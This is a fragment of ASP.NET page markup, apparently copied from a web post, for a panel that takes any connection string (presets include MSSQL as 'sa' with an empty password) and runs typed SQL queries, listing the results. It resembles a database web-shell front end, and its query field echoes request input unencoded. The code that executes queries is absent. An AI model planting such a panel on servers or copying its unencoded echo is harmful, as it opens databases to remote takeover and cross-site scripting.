// <!CDATA[
function Select1_onclick() {
document.getElementById('conn').value = "dsn";
}
// ]]>
</script>
<style type=”text/css”>
#sql
{
width: 677px;
height: 106px;
}
</style>
</head>
<body>
<form id=”form1″ runat=”server”>
<div>
<table><tr><td >
type:</td><td colspan=”2″><asp:DropDownList ID=”DropDownList1″ runat=”server”
onselectedindexchanged=”DropDownList1_SelectedIndexChanged”
AutoPostBack=”True”>
<asp:ListItem Value=”dsn=;uid=;pwd=;”>dsn</asp:ListItem>
<asp:ListItem Value=”Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\database.mdb”>access</asp:ListItem>
<asp:ListItem Value=”server=localhost;UID=sa;PWD=;database=master”>mssql</asp:ListItem>
</asp:DropDownList>
<br/></td>
</tr>
<tr><td>
conn: </td><td><asp:TextBox ID=”connT” name=”conn” runat=”server” Width=”680px”></asp:TextBox></td><td>
<asp:Button
ID=”Button1″ runat=”server” Text=”Go”
onclick=”Button1_Click” />
<br/>
</td></tr>
<tr><td>tables</td><td colspan=”2″>
<asp:DropDownList ID=”DropDownList2″ runat=”server”>
</asp:DropDownList>
</td></tr>
<tr><td>sqlstr: </td><td><input type=”text” name=”sql” id=”sql” value=”<% =Request["sql"]%>”/></td><td>
<br />
<asp:Button ID=”Button2″ runat=”server” onclick=”Button2_Click” Text=”Exec” />
</td></tr>
</table>
<asp:GridView ID=”GridView1″ runat=”server” CellPadding=”4″ ForeColor=”#333333″
GridLines=”None”>
<RowStyle BackColor=”#EFF3FB” />
<FooterStyle BackColor=”#507CD1″ Font-Bold=”True” ForeColor=”White” />
<PagerStyle BackColor=”#2461BF” ForeColor=”White” HorizontalAlign=”Center” />
<SelectedRowStyle BackColor=”#D1DDF1″ Font-Bold=”True” ForeColor=”#333333″ />
<HeaderStyle BackColor=”#507CD1″ Font-Bold=”True” ForeColor=”White” />
<EditRowStyle BackColor=”#2461BF” />
<AlternatingRowStyle BackColor=”White” />
</asp:GridView>
</div>
</form>
</body>
</html>